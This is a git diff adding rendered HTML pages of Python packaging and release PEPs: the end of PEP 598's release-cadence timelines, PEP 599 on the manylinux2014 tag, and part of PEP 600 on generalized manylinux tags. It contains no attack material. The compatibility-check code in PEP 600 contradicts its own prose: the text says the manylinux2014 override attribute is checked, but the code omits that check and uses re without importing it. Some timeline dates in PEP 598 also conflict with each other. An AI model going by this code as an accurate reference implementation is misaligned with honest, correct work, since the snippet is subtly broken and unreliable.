  • 2020-10: 3.9.1 (IFR)
  • +
  • 2021-01: 3.9.2 (IFR)
  • +
  • 2021-04: 3.9.3 (IFR)
  • +
  • 2021-07: 3.9.4 (IFR)
  • +
  • 2021-10: 3.9.5
  • +
  • 2022-01: 3.9.6
  • +
  • 2022-04: 3.9.7
  • +
  • 2022-07: 3.9.8
  • +
  • 2022-10: 3.9.9 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2025-10: 3.9.x branch closed
  • +
+

This approach would mean there were still always two or three active branches, +it’s just that proportionally more time would be spent with a branch in the +“feature releases” phase, as compared to the “pre-alpha”, “pre-beta”, and +“pre-release” phases:

+
    +
  • 2019-04 -> 2019-10: 3.9.0 pre-alpha, 3.8.0 pre-release, 3.7.x maintenance
  • +
  • 2019-10 -> 2020-03: 3.9.0 pre-beta, 3.8.x maintenance
  • +
  • 2020-03 -> 2020-07: 3.10.0 pre-alpha, 3.9.0 pre-release, 3.8.x maintenance
  • +
  • 2020-07 -> 2021-10: 3.10.0 pre-alpha, 3.9.x feature releases, 3.8.x maintenance
  • +
  • 2021-10 -> 2022-03: 3.10.0 pre-beta, 3.9.x maintenance
  • +
  • 2022-03 -> 2022-07: 3.11.0 pre-alpha, 3.10.0 pre-release, 3.9.x maintenance
  • +
  • 2022-07 -> 2023-10: 3.11.0 pre-alpha, 3.10.x feature releases, 3.9.x maintenance
  • +
  • 2023-10 -> 2024-03: 3.11.0 pre-beta, 3.10.x maintenance
  • +
  • 2024-03 -> 2024-07: 3.12.0 pre-alpha, 3.11.0 pre-release, 3.10.x maintenance
  • +
  • … etc
  • +
+
+
+

Duration of the unreleased pre-alpha period

+

In the baseline proposal in this PEP, the proposed timelines still include +periods where we go for 18 months without making a release from the main git +branch (e.g. 3.9.0b1 would branch off in 2020-05, and 3.10.0a1 wouldn’t be +published until 2021-11). They just allow for a wider variety of changes to +be backported to the most recent maintenance branch for 12 of those months.

+

The variant of the proposal that moves the beta branch point earlier in the +release series lifecycle would increase that period of no direct releases to +21 months - the only period where releases were made directly from the main +branch would be during the relatively short window between the last incremental +feature release of the previous release series, and the beta branch point a +few months later.

+

While alternating the annual cadence between “big foundational enhancements” +and “targeted low risk API usability improvements” is a deliberate feature of +this proposal, it still seems strange to wait that long for feedback in the +event that changes are made shortly after the previous release series is +branched.

+

An alternative way of handling this would be to start publishing alpha releases +for the next baseline feature release during the feature addition period (similar +to the way that PEP 596 proposes to starting publishing Python 3.9.0 alpha +releases during the Python 3.8.0 release candidate period).

+

However, rather than setting specific timelines for that at a policy level, +it may make sense to leave that decision to individual release managers, based +on the specific changes that are being proposed for the release they’re +managing.

+
+
+

Why not switch directly to full semantic versioning?

+

If this were a versioning design document for a new language, it would use +semantic versioning: the policies described above for baseline feature releases +would be applied to X.0.0 releases, the policies for incremental feature +releases would be applied to X.Y.0 releases, and the policies for maintenance +releases would be applied to X.Y.Z releases.

+

The problem for Python specifically is that all the policies and properties for +parallel installation support and ABI compatibility definitions are currently +associated with the first two fields of the version number, and it has been +that way for the better part of thirty years.

+

As a result, it makes sense to split out the policy question of introducing +incremental feature releases in the first place from the technical question of +making the version numbering scheme better match the semantics of the different +release types.

+

If the proposal in this PEP were to be accepted by the Steering Council for +Python 3.9, then a better time to tackle that technical question would be for +the subsequent October 2022 baseline feature release, as there are already inherent +compatibility risks associated with the choice of either “Python 4.0” (erroneous +checks for the major version being exactly 3 rather than 3 or greater), or +“Python 3.10” (code incorrectly assuming that the minor version will always +contain exactly one decimal digit) [1].

+

While the text of this PEP assumes that the release published in 2022 will be +3.10 (as the PEP author personally considers that the more reasonable and most +likely choice), there are complex pros and cons on both sides of that decision, +and this PEP does arguably add a potential pro in favour of choosing the +“Python 4.0” option (with the caveat that we would also need to amend the +affected installation layout and compatibility markers to only consider the +major version number, rather than both the major and minor version).

+

If such a version numbering change were to be proposed and accepted, then the +example 3.10.x timeline given above would instead become the following 4.x +series timeline:

+
    +
  • 2021-11: 4.0.0a1
  • +
  • … additional alpha releases as determined by the release manager
  • +
  • 2022-05: 4.0.0b1
  • +
  • … additional beta releases as determined by the release manager
  • +
  • 2022-08: 4.0.0bX (final beta release that locks ABI compatibility)
  • +
  • 2022-09: 4.0.0rc1
  • +
  • … additional release candidates as determined by the release manager
  • +
  • 2022-10: 4.0.0 (BFR)
  • +
  • 2023-01: 4.1.0 (IFR)
  • +
  • 2023-04: 4.2.0 (IFR)
  • +
  • 2023-07: 4.3.0 (IFR)
  • +
  • 2023-10: 4.4.0 (IFR)
  • +
  • 2024-01: 4.4.1
  • +
  • 2024-04: 4.4.2
  • +
  • 2024-07: 4.4.3
  • +
  • 2024-10: 4.4.4 (final regular maintenance release)
  • +
  • … additional security fix only releases as needed
  • +
  • 2027-10: 4.x branch closed
  • +
+

And the 5 year schedule forecast would look like:

+
    +
  • 2019-04 -> 2019-10: 3.9.0 pre-alpha, 3.8.0 pre-release, 3.7.x maintenance
  • +
  • 2019-10 -> 2020-05: 3.9.0 pre-beta, 3.8.x maintenance
  • +
  • 2020-05 -> 2020-10: 4.0.0 pre-alpha, 3.9.0 pre-release, 3.8.x maintenance
  • +
  • 2020-10 -> 2021-10: 4.0.0 pre-alpha, 3.9.x feature releases, 3.8.x maintenance
  • +
  • 2021-10 -> 2022-05: 4.0.0 pre-beta, 3.9.x maintenance
  • +
  • 2022-05 -> 2022-10: 5.0.0 pre-alpha, 4.0.0 pre-release, 3.9.x maintenance
  • +
  • 2022-10 -> 2023-10: 5.0.0 pre-alpha, 4.x.0 feature releases, 3.9.x maintenance
  • +
  • 2023-10 -> 2024-05: 5.0.0 pre-beta, 4.x.y maintenance
  • +
  • 2024-05 -> 2024-10: 6.0.0 pre-alpha, 5.0.0 pre-release, 4.x.y maintenance
  • +
  • … etc
  • +
+
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0598.rst

+

Last modified: 2023-10-11 12:05:51 GMT

+ +
+ +
+ \ No newline at end of file
diff --git a/pep-0599/index.html b/pep-0599/index.html new file mode 100644 index 00000000000..10eb0b722af --- /dev/null +++ b/pep-0599/index.html @@ -0,0 +1,487 @@
+ PEP 599 – The manylinux2014 Platform Tag | peps.python.org
+
+
+

+
+
+

PEP 599 – The manylinux2014 Platform Tag

+
+
Author:
+
Dustin Ingram <di at python.org>
+
Sponsor:
+
Paul Moore <p.f.moore at gmail.com>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Superseded
+
Type:
+
Informational
+
Topic:
+
Packaging
+
Created:
+
29-Apr-2019
+
Post-History:
+
29-Apr-2019
+
Superseded-By:
+
600
+
Resolution:
+
Discourse message
+
+
+
+
+
+

Abstract

+

This PEP proposes the creation of a manylinux2014 platform tag to +succeed the manylinux2010 tag introduced by PEP 513. It also +proposes that PyPI and pip both be updated to support uploading, +downloading, and installing manylinux2014 distributions on +compatible platforms.

+
+
+

Rationale

+

CentOS 6 is now the oldest supported CentOS release, and will receive +maintenance updates through November 30th, 2020, [1] at which point +it will reach end-of-life, and no further updates such as security +patches will be made available. All wheels built under the +manylinux2010 images will remain at obsolete versions after that +point.

+

Therefore, we propose the continuation of the existing manylinux +standard, and that a new PEP 425-style platform tag called +manylinux2014 be derived from CentOS 7 and that the manylinux +toolchain, PyPI, and pip be updated to support it.

+

Similar to how PEP 571 and PEP 513 drew allowed shared +libraries and their symbol versions from CentOS 5.11 and CentOS 6, +respectively, a manylinux2014 platform tag will draw its libraries +and symbol versions from CentOS 7, which will reach end-of-life on +June 30th, 2024. [1]

+

The manylinuxYYYY pattern has a number of advantages that motivate +continuing with the current status quo:

+
    +
  • Well-defined Docker images with clearly specified compatible +libraries;
  • +
  • No need to survey for compatibility issues across multiple releases;
  • +
  • A single build image and auditwheel profile per architecture.
  • +
+

There are also some disadvantages:

+
    +
  • Requires drafting a new PEP for every new standard;
  • +
  • Requires adding the new platform tag to installers (e.g., pip);
  • +
  • Installers are unable to install a platform tag which predates a +given release.
  • +
+

There are also challenges which would exist for any proposal, +including the time and effort it takes to define, prepare and release +the Docker images and corresponding auditwheel profiles. These +challenges were experienced in the long rollout period for +manylinux2010, which took approximately 1 year from PEP acceptance +to compatible build environment published. [3]

+

However, if this PEP can be an indicator, the process is now well-defined and easily repeatable, which should shorten the rollout timeline for newer, updated platform tags.

+
+
+

The manylinux2014 policy

+

The following criteria determine a linux wheel’s eligibility for +the manylinux2014 tag:

+
    +
  1. The wheel may only contain binary executables and shared objects +compiled for one of the following architectures supported by CentOS +7, or a CentOS 7 compatible base image (such as ubi7): [4]
    x86_64
i686
aarch64
armv7l
ppc64
ppc64le
s390x
    +
    +
    +

    This list adds support for ARMv7 (armv7l), ARMv8 (aarch64) and PowerPC +(ppc64, ppc64le) architectures supported by the CentOS Alternative +Architecture Special Interest Group, as well as the IBM Z (s390x) +architecture. [5]

    +
2. The wheel’s binary executables or shared objects may not link against externally-provided libraries except those in the following list:
    libgcc_s.so.1
libstdc++.so.6
libm.so.6
libdl.so.2
librt.so.1
libc.so.6
libnsl.so.1
libutil.so.1
libpthread.so.0
libresolv.so.2
libX11.so.6
libXext.so.6
libXrender.so.1
libICE.so.6
libSM.so.6
libGL.so.1
libgobject-2.0.so.0
libgthread-2.0.so.0
libglib-2.0.so.0
    +
    +
    +

    This list is identical to the externally-provided libraries +originally allowed for manylinux2010, with one exception: +libcrypt.so.1 was removed due to being deprecated in Fedora 30. +libpythonX.Y remains ineligible for inclusion for the same +reasons outlined in PEP 513.

    +

    On Debian-based systems, these libraries are provided by the +packages:

Package         Libraries
libc6           libdl.so.2, libresolv.so.2, librt.so.1, libc.so.6, libpthread.so.0, libm.so.6, libutil.so.1, libnsl.so.1
libgcc1         libgcc_s.so.1
libgl1          libGL.so.1
libglib2.0-0    libgobject-2.0.so.0, libgthread-2.0.so.0, libglib-2.0.so.0
libice6         libICE.so.6
libsm6          libSM.so.6
libstdc++6      libstdc++.so.6
libx11-6        libX11.so.6
libxext6        libXext.so.6
libxrender1     libXrender.so.1
    +

    On RPM-based systems, they are provided by these packages:

Package      Libraries
glib2        libglib-2.0.so.0, libgthread-2.0.so.0, libgobject-2.0.so.0
glibc        libresolv.so.2, libutil.so.1, libnsl.so.1, librt.so.1, libpthread.so.0, libdl.so.2, libm.so.6, libc.so.6
libICE       libICE.so.6
libX11       libX11.so.6
libXext      libXext.so.6
libXrender   libXrender.so.1
libgcc       libgcc_s.so.1
libstdc++    libstdc++.so.6
mesa         libGL.so.1
    +
3. If the wheel contains binary executables or shared objects linked against any allowed libraries that also export versioned symbols, they may only depend on the following maximum versions:
    GLIBC_2.17
CXXABI_1.3.7 (CXXABI_TM_1 is also allowed)
GLIBCXX_3.4.19
GCC_4.8.0
    +
    +
    +

As an example, manylinux2014 wheels may include binary artifacts that require glibc symbols at version GLIBC_2.12, because this is an earlier version than the maximum of GLIBC_2.17 (a minimal version-comparison sketch follows this list).

    +
4. If a wheel is built for any version of CPython 2 or CPython versions 3.0 up to and including 3.2, it must include a CPython ABI tag indicating its Unicode ABI. A manylinux2014 wheel built against Python 2, then, must include either the cpy27mu tag indicating it was built against an interpreter with the UCS-4 ABI or the cpy27m tag indicating an interpreter with the UCS-2 ABI. (PEP 3149 [7])
5. A wheel must not require the PyFPE_jbuf symbol. This is achieved by building it against a Python compiled without the --with-fpectl configure flag.
+
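As promised above, here is a minimal, illustrative sketch of the version-comparison rule from criterion 3. It is not auditwheel’s actual implementation (real tools collect the required symbol versions from the ELF headers of the wheel’s binaries); it only shows how a collected symbol version would be checked against the maxima:

MAX_VERSIONS = {
    "GLIBC": (2, 17),
    "CXXABI": (1, 3, 7),
    "GLIBCXX": (3, 4, 19),
    "GCC": (4, 8, 0),
}

def symbol_version_ok(symbol_version):
    # e.g. "GLIBC_2.12" -> prefix "GLIBC", version (2, 12)
    if symbol_version == "CXXABI_TM_1":
        return True  # explicitly allowed by criterion 3
    prefix, _, version = symbol_version.partition("_")
    if prefix not in MAX_VERSIONS:
        return False
    return tuple(int(x) for x in version.split(".")) <= MAX_VERSIONS[prefix]

assert symbol_version_ok("GLIBC_2.12")      # earlier than the 2.17 maximum
assert not symbol_version_ok("GLIBC_2.18")  # later than the maximum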
+
+

Compilation of Compliant Wheels

+

Like manylinux1, the auditwheel tool adds manylinux2014 +platform tags to linux wheels built by pip wheel or +bdist_wheel in a manylinux2014 Docker container.

+
+

Docker Images

+

A manylinux2014 Docker image based on CentOS 7 x86_64 should be +provided for building binary linux wheels that can reliably be +converted to manylinux2014 wheels. This image will come with a +full compiler suite installed (gcc, g++, and gfortran +4.8.5) as well as the latest releases of Python and pip.

+
+
+

Auditwheel

+

The auditwheel tool will also be updated to produce +manylinux2014 wheels. [8] Its behavior and purpose will be +otherwise unchanged from PEP 513.

+
+
+
+

Platform Detection for Installers

+

Platforms may define a manylinux2014_compatible boolean attribute +on the _manylinux module described in PEP 513. A platform is +considered incompatible with manylinux2014 if the attribute is +False.

+

If the _manylinux module is not found, or it does not have the +attribute manylinux2014_compatible, tools may fall back to +checking for glibc. If the platform has glibc 2.17 or newer, it is +assumed to be compatible unless the _manylinux module says +otherwise.

+

Specifically, the algorithm we propose is:

+
def is_manylinux2014_compatible():
+    # Only Linux, and only supported architectures
+    from distutils.util import get_platform
+
+    if get_platform() not in [
+        "linux-x86_64",
+        "linux-i686",
+        "linux-aarch64",
+        "linux-armv7l",
+        "linux-ppc64",
+        "linux-ppc64le",
+        "linux-s390x",
+    ]:
+        return False
+
+    # Check for presence of _manylinux module
+    try:
+        import _manylinux
+
+        return bool(_manylinux.manylinux2014_compatible)
+    except (ImportError, AttributeError):
+        # Fall through to heuristic check below
+        pass
+
+    # Check glibc version. CentOS 7 uses glibc 2.17.
+    # PEP 513 contains an implementation of this function.
+    return have_compatible_glibc(2, 17)
+
+
+
+
+

Backwards compatibility with manylinux2010 wheels

+

As explained in PEP 513, the specified symbol versions for +manylinux1 allowed libraries constitute an upper bound. The +same is true for the symbol versions defined for manylinux2014 in +this PEP. As a result, manylinux1 and manylinux2010 wheels +are considered manylinux2014 wheels. A pip that recognizes +the manylinux2014 platform tag will thus install manylinux2010 +wheels for manylinux2014 platforms – even when explicitly set – +when no manylinux2014 wheels are available.

+
+
+

PyPI Support

+

PyPI should permit wheels containing the manylinux2014 platform +tag to be uploaded in the same way that it permits manylinux2010.

+

If technically feasible, PyPI should attempt to verify the +compatibility of manylinux2014 wheels, but that capability is not +a requirement for adoption of this PEP.

+

Package authors should not upload non-compliant manylinux2014 +wheels to PyPI, and should be aware that PyPI may begin blocking +non-compliant wheels from being uploaded.

+
+
+

References

+ +
+
+

Acceptance

+

PEP 599 was accepted by Paul Moore on July 31, 2019.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0599.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
\ No newline at end of file diff --git a/pep-0600/index.html b/pep-0600/index.html new file mode 100644 index 00000000000..1294f089390 --- /dev/null +++ b/pep-0600/index.html @@ -0,0 +1,598 @@ PEP 600 – Future ‘manylinux’ Platform Tags for Portable Linux Built Distributions | peps.python.org
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 600 – Future ‘manylinux’ Platform Tags for Portable Linux Built Distributions

+
+
Author:
+
Nathaniel J. Smith <njs at pobox.com>, +Thomas Kluyver <thomas at kluyver.me.uk>
+
Sponsor:
+
Paul Moore <p.f.moore at gmail.com>
+
BDFL-Delegate:
+
Paul Moore <p.f.moore at gmail.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Packaging
+
Created:
+
03-May-2019
+
Post-History:
+
03-May-2019
+
Replaces:
+
513, 571, 599
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This PEP proposes a scheme for new ‘manylinux’ wheel tags to be +defined without requiring a PEP for every specific tag, similar to how +Windows and macOS tags already work. This will allow package +maintainers to take advantage of new tags more quickly, while making +better use of limited volunteer time.

+

Non-goals include: handling non-glibc-based platforms; integrating +with external package managers or handling external dependencies such +as CUDA; making manylinux tags more sophisticated than their +Windows/macOS equivalents; doing anything besides taking our existing +tried-and-tested approach and streamlining it. These are important +issues and other PEPs may address them in the future, but for this PEP +they’re out of scope.

+
+
+

Rationale

+

Python users appreciate it when PyPI has pre-compiled packages for +their platform, because it makes installation fast and simple. But +distributing pre-compiled binaries on Linux is challenging because of +the diversity of Linux-based platforms. For example, Debian, Android, +and Alpine all use the Linux kernel, but with radically different +userspace libraries, which makes it difficult or impossible to create +a single wheel that works on all three. This complexity has caused +many previous discussions of Linux wheels to stall out.

+

The “manylinux” project succeeded by adopting a strategy of ruthless +pragmatism. We chose a large but tractable set of Linux platforms – +specifically, mainstream glibc-based distributions like Debian, +OpenSuSE, Ubuntu, RHEL, etc. – and then we did whatever it takes to +make wheels that work across all these platforms.

+

This approach requires many compromises. Manylinux wheels can only +rely on external libraries that maintain a consistent ABI and are +universally available across all these distributions, which in +practice restricts them to a small set of core libraries like glibc +and a few others. Wheels have to be built on carefully-chosen +platforms of the oldest possible vintage, using a Python that is +itself built in a carefully-chosen configuration. Other shared library +dependencies have to be bundled into the wheel, which requires a +complex process to avoid collisions between unrelated wheels. And +finally, the details of these requirements change over time, as new +distro versions are released, and old ones fall out of use.

+

It turns out that these requirements are not too onerous: they’re +essentially equivalent to what you have to do to ship Windows or macOS +wheels, and the manylinux approach has achieved substantial uptake +among both package maintainers and end-users. But any manylinux PEP +needs some way to address these complexities.

+

In previous manylinux PEPs (PEP 513, PEP 571, PEP 599), we’ve +done this by attempting to write down in the PEP the exact set of +libraries, symbol versions, Python configuration, etc. that we +believed would lead to wheels that work on all mainstream glibc-based +Linux systems. But this created several problems:

+

First, PEPs are generally supposed to be normative references: if +software doesn’t match the PEP, then we fix the software. But in this +case, the PEPs are attempting to describe Linux distributions, which +are a moving target, and do not consider our PEPs to constrain their +behavior. This means that we’ve been taking on an unbounded commitment +to keep updating every manylinux PEP whenever the Linux distro +landscape changes. This is a substantial commitment for unfunded +volunteers to take on, and it’s not clear that this work produces +value for our users.

+

And second, every time we move manylinux forward to a newer range of +supported platforms, or add support for a new architecture, we have to +go through a fairly elaborate process: writing a new PEP, updating the +PyPI and pip codebases to recognize the new tag, waiting for the new +pip to percolate to users, etc. None of this happens on Windows/macOS; +it’s only a tax on Linux maintainers. This slows deployment of new +manylinux versions, and consumes part of our community’s limited PEP +review bandwidth, thus slowing progress of the Python packaging +ecosystem as a whole. This is especially problematic for less-popular +architectures, who have less volunteer resources to overcome these +barriers.

+

How can we fix it?

+

A manylinux PEP has to address three main audiences:

+
    +
  • Package installers, like pip, need to be able to determine which +wheel tags are compatible with the system they find themselves +running on. This requires some automated process to introspect the +system and match it up with wheel tags.
  • +
  • Package indexes, like PyPI, need to be able to validate which +wheel tags are valid. Generally, this just requires something like a +list of valid tags, or regex they match, with no need to know +anything about the actual semantics for individual tags. (But see +the discussion of upload verification below.)
  • +
  • Package maintainers need to be able to build wheels that meet +the requirements for a given wheel tag.
  • +
+

Here’s the key insight behind this new PEP: it’s crucial that +different package installers and package indexes all agree on +which manylinux tags are valid and which systems they install on, so +we need a PEP to specify these – but, these are straightforward, and +don’t really change between manylinux versions. The complicated part +that keeps changing is the process of actually building the wheels +– but, if there are multiple competing build environments, it doesn’t +matter whether they use exactly the same rules as each other, as long +as they all produce wheels that work on end-user systems. Therefore, +we don’t need an interoperability standard for building wheels, so we +don’t need to write the details into a PEP.

+

To further convince ourselves that this approach will work, let’s look +again at how we handle wheels on Windows and macOS: the PEPs describe +which tags are valid, and which systems they’re supposed to work on, +but not how to actually build wheels for those platforms. And in +practice, if you want to distribute Windows or macOS wheels, you might +have to jump through some complicated and poorly documented hoops in +order to bundle dependencies, target the right range of OS versions, +etc. But the system works, and the way to improve it is to write +better docs and build better tooling; no-one thinks that the way to +make Windows wheels work better is to publish a PEP describing +which symbols we think Microsoft should be including in their +libraries and how their linker ought to work. This PEP extends that +philosophy to manylinux as well.

+
+
+

Specification

+
+

Core definition

+

Tags using the new scheme will look like:

+
manylinux_2_17_x86_64
+
+
+

Or more generally:

+
manylinux_${GLIBCMAJOR}_${GLIBCMINOR}_${ARCH}
+
+
+

This tag is a promise: the wheel’s creator promises that the wheel +will work on any mainstream Linux distro that uses glibc version +${GLIBCMAJOR}.${GLIBCMINOR} or later, and where the ${ARCH} +matches the return value from distutils.util.get_platform(). (For +more detail about architecture tags, see PEP 425.)

+

If a user installs this wheel into an environment that matches these +requirements and it doesn’t work, then that wheel does not comply with +this specification. This should be considered a bug in the wheel, and +it’s the wheel creator’s responsibility to look for a fix (possibly +with the help of the broader community).

+

The word “mainstream” is intentionally somewhat vague, and should be +interpreted expansively. The goal is to rule out weird homebrew Linux +systems; generally any distro you’ve actually heard of should be +considered “mainstream”. We also provide a way for maintainers of +“weird” distros to manually override this check, though based on +experience with previous manylinux PEPs, we don’t expect this feature +to see much use.

+

And finally, compliant wheels are required to “play well with others”, +i.e., installing a manylinux wheel must not cause other unrelated +packages to break.

+

Any method of producing wheels which meets these criteria is +acceptable. However, in practice we expect that the auditwheel project +will maintain an up-to-date set of tools and build images for +producing manylinux wheels, as well as documentation about how they +work and how to use them, and that most maintainers will want to use +those. For the latest information on building manylinux wheels, +including recommendations about which build images to use, see +https://packaging.python.org.

+

Since these requirements are fairly high-level, here are some examples +of how they play out in specific situations:

+

Example: if a wheel is tagged as manylinux_2_17_x86_64, but it +uses symbols that were only added in glibc 2.18, then that wheel won’t +work on systems with glibc 2.17. Therefore, we can conclude that this +wheel is in violation of this specification.

+

Example: Until ~2017, all major Linux distros included +libncursesw.so.5 as part of their default install. Until that +date, a wheel that linked to libncursesw.so.5 was compliant with +this specification. Then, distros started switching to ncurses 6, +which has a different name and incompatible ABI, and stopped +installing libncursesw.so.5 by default. So after that date, a +wheel that links to libncursesw.so.5 was no longer compliant with +this specification.

+

Example: The Linux ELF linker places all shared library SONAMEs into a +single process-global namespace. If independent wheels used the same +SONAME for their bundled libraries, they might end up colliding and +using the wrong library version, which would violate the “play well +with others” rule. Therefore, this specification requires that wheels +use globally-unique names for all bundled libraries. (Auditwheel +currently accomplishes this by renaming all bundled libraries to +include a globally-unique hash.)

+
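For illustration, one way to derive such a globally-unique name is to embed a short hash of the library’s contents. This is a sketch in the spirit of auditwheel’s renaming step, not its actual code:

import hashlib

def mangled_soname(soname, library_bytes):
    # Embed a short content hash so two unrelated wheels can never
    # bundle libraries with colliding SONAMEs.
    digest = hashlib.sha256(library_bytes).hexdigest()[:8]
    base, _, suffix = soname.partition(".so")
    return f"{base}-{digest}.so{suffix}"

# e.g. "libfoo.so.1" -> "libfoo-<hash>.so.1"
print(mangled_soname("libfoo.so.1", b"library contents"))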

Example: we’ve observed certain wheels using C++ in ways that +interfere with other packages via an unclear +mechanism. This is also a violation of the “play well with others” +rule, so those wheels aren’t compliant with this specification.

+

Example: The imaginary architecture LEG v7 has both big-endian and +little-endian variants. Big-endian binaries require a big-endian +system, and little-endian binaries require a little-endian system. But +unfortunately, it’s discovered that due to a bug in PEP 425, both +variants use the same architecture tag, legv7. This makes it +impossible to create a compliant manylinux_2_17_legv7 wheel: no +matter what we do, it will crash on some user’s systems. So, we write +a new PEP defining architecture tags legv7le and legv7be; now +we can ship manylinux LEG v7 wheels.

+

Example: There’s also a LEG v8. It also has big-endian and little-endian variants. But fortunately, it turns out that PEP 425 already does the right thing for LEG v8, so LEG v8 enthusiasts can start shipping manylinux_2_17_legv8le and manylinux_2_17_legv8be wheels immediately once this PEP is implemented, even though the authors of this PEP don’t know anything at all about LEG v8.

+
+
+

Legacy manylinux tags

+

The existing manylinux tags are redefined as aliases for new-style +tags:

+
    +
  • manylinux1_x86_64 is now an alias for manylinux_2_5_x86_64
  • +
  • manylinux1_i686 is now an alias for manylinux_2_5_i686
  • +
  • manylinux2010_x86_64 is now an alias for manylinux_2_12_x86_64
  • +
  • manylinux2010_i686 is now an alias for manylinux_2_12_i686
  • +
  • manylinux2014_x86_64 is now an alias for manylinux_2_17_x86_64
  • +
  • manylinux2014_i686 is now an alias for manylinux_2_17_i686
  • +
  • manylinux2014_aarch64 is now an alias for manylinux_2_17_aarch64
  • +
  • manylinux2014_armv7l is now an alias for manylinux_2_17_armv7l
  • +
  • manylinux2014_ppc64 is now an alias for manylinux_2_17_ppc64
  • +
  • manylinux2014_ppc64le is now an alias for manylinux_2_17_ppc64le
  • +
  • manylinux2014_s390x is now an alias for manylinux_2_17_s390x
  • +
+

This redefinition is largely a no-op, but does affect a few things:

+
    +
  • Previously, we had an open-ended and growing commitment to keep +updating every manylinux PEP whenever a new Linux distro was +released, for the rest of time. By making this PEP normative for the +older tags, that obligation goes away. When this PEP is accepted, +the previous manylinux PEPs will receive a final update noting that +they are no longer maintained and referring to this PEP.
  • +
  • The “play well with others” rule was always intended, but previous +PEPs didn’t state it explicitly; now it’s explicit.
  • +
  • Previous PEPs assumed that glibc 3.x might be incompatible with +glibc 2.x, so we checked for compatibility between a system and a +tag using logic like:
    sys_major == tag_major and sys_minor >= tag_minor
    +
    +
    +

    Recently the glibc maintainers advised us that we +should assume that glibc will maintain backwards-compatibility +indefinitely, even if they bump the major version number. So the new +check for compatibility is:

    +
    (sys_major, sys_minor) >= (tag_major, tag_minor)
    +
    +
    +
  • +
+
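To illustrate the practical difference, here is a minimal sketch using hypothetical version numbers: under the old rule a future glibc 3.0 system would reject a glibc 2.17 tag, while the new tuple comparison accepts it:

def old_check(sys_ver, tag_ver):
    # previous assumption: a glibc major bump breaks compatibility
    return sys_ver[0] == tag_ver[0] and sys_ver[1] >= tag_ver[1]

def new_check(sys_ver, tag_ver):
    # glibc promises backwards compatibility across major bumps
    return sys_ver >= tag_ver  # lexicographic tuple comparison

tag = (2, 17)
print(old_check((2, 28), tag), new_check((2, 28), tag))  # True True
print(old_check((3, 0), tag), new_check((3, 0), tag))    # False True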
+
+

Package installers

+

Generally, package installers should install manylinux wheels on +systems that have an appropriate glibc and architecture, and not +otherwise. If there are multiple compatible manylinux wheels +available, then the wheel with the highest glibc version should be +preferred, in order to take advantage of newer compilers and glibc +features.

+
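For example, a minimal sketch of that preference rule (illustrative only, not pip’s actual resolver code) might look like:

import re

def glibc_version(tag):
    # Assumes new-style tags; legacy aliases would be normalized first.
    m = re.match(r"manylinux_([0-9]+)_([0-9]+)_", tag)
    return (int(m.group(1)), int(m.group(2)))

compatible = [
    "manylinux_2_5_x86_64",
    "manylinux_2_17_x86_64",
    "manylinux_2_12_x86_64",
]
print(max(compatible, key=glibc_version))  # manylinux_2_17_x86_64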

In addition, we follow previous specifications, and allow for Python +distributors to manually override this check by adding a +_manylinux module to their standard library. If this package is +importable, and if it defines a function called +manylinux_compatible, then package installers should call this +function, passing in the major version, minor version, and +architecture from the manylinux tag, and it will either return a +boolean saying whether wheels with the given tag should be considered +compatible with the current system, or else None to indicate that +the default logic should be used.

+

For compatibility with previous specifications, if the tag is +manylinux1 or manylinux_2_5 exactly, then we also check the +module for a boolean attribute manylinux1_compatible, if the +tag version is manylinux2010 or manylinux_2_12 exactly, then +we also check the module for a boolean attribute +manylinux2010_compatible, and if the tag version is +manylinux2014 or manylinux_2_17 exactly, then we also check +the module for a boolean attribute manylinux2014_compatible. If +both the new and old attributes are defined, then +manylinux_compatible takes precedence.

+

Here’s some example code. You don’t have to actually use this code, +but you can use it for reference if you have questions about the exact +semantics:

+
LEGACY_ALIASES = {
+    "manylinux1_x86_64": "manylinux_2_5_x86_64",
+    "manylinux1_i686": "manylinux_2_5_i686",
+    "manylinux2010_x86_64": "manylinux_2_12_x86_64",
+    "manylinux2010_i686": "manylinux_2_12_i686",
+    "manylinux2014_x86_64": "manylinux_2_17_x86_64",
+    "manylinux2014_i686": "manylinux_2_17_i686",
+    "manylinux2014_aarch64": "manylinux_2_17_aarch64",
+    "manylinux2014_armv7l": "manylinux_2_17_armv7l",
+    "manylinux2014_ppc64": "manylinux_2_17_ppc64",
+    "manylinux2014_ppc64le": "manylinux_2_17_ppc64le",
+    "manylinux2014_s390x": "manylinux_2_17_s390x",
+}
+
+def manylinux_tag_is_compatible_with_this_system(tag):
+    # Normalize and parse the tag
+    tag = LEGACY_ALIASES.get(tag, tag)
+    m = re.match("manylinux_([0-9]+)_([0-9]+)_(.*)", tag)
+    if not m:
+        return False
+    tag_major_str, tag_minor_str, tag_arch = m.groups()
+    tag_major = int(tag_major_str)
+    tag_minor = int(tag_minor_str)
+
+    if not system_uses_glibc():
+        return False
+    sys_major, sys_minor = get_system_glibc_version()
+    if (sys_major, sys_minor) < (tag_major, tag_minor):
+        return False
+    sys_arch = get_system_arch()
+    if sys_arch != tag_arch:
+        return False
+
+    # Check for manual override
+    try:
+        import _manylinux
+    except ImportError:
+        pass
+    else:
+        if hasattr(_manylinux, "manylinux_compatible"):
+            result = _manylinux.manylinux_compatible(
+                tag_major, tag_minor, tag_arch,
+            )
+            if result is not None:
+                return bool(result)
+        else:
+            if (tag_major, tag_minor) == (2, 5):
+                if hasattr(_manylinux, "manylinux1_compatible"):
+                    return bool(_manylinux.manylinux1_compatible)
+            if (tag_major, tag_minor) == (2, 12):
+                if hasattr(_manylinux, "manylinux2010_compatible"):
+                    return bool(_manylinux.manylinux2010_compatible)
+
+    return True
+
+
+
+
+

Package indexes

+

The exact set of wheel tags accepted by PyPI, or any package index, is +a policy question, and up to the maintainers of that index. But, we +recommend that package indexes accept any wheels whose platform tag +matches the following regexes:

+
    +
  • manylinux1_(x86_64|i686)
  • +
  • manylinux2010_(x86_64|i686)
  • +
  • manylinux2014_(x86_64|i686|aarch64|armv7l|ppc64|ppc64le|s390x)
  • +
